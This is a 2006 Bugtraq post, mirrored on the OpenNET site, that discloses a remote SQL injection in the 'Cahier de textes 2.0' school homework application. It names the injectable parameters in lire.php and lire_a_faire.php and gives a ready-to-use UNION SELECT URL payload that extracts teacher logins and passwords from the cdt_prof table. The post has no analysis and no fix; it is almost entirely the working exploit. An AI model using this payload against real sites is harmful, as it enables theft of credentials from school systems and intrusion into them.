The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Cahier de textes 2.0 Remote SQL injection Exploit


<< Previous INDEX Search src / Print Next >>
Date: 7 Oct 2006 14:52:31 -0000
From: sami@linuxmail.org
To: bugtraq@securityfocus.com
Subject: Cahier de textes 2.0   Remote SQL injection Exploit
X-Virus-Scanned: antivirus-gw at tyumen.ru


# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#             Cahier  de  textes  
#   Pierre Lemaitre - St LТ (France) - Ver 2.0
#           
#          Remote SQL injection Exploit
#
#              Discovred By s4mi
#           s4mi[at]linuxmail[dot]org
************************************************
#
#exploit
#
#   http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=&#091;SQL]
or 
http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]

***********************************
expemle of sql code to get admin user and password

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*
 


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру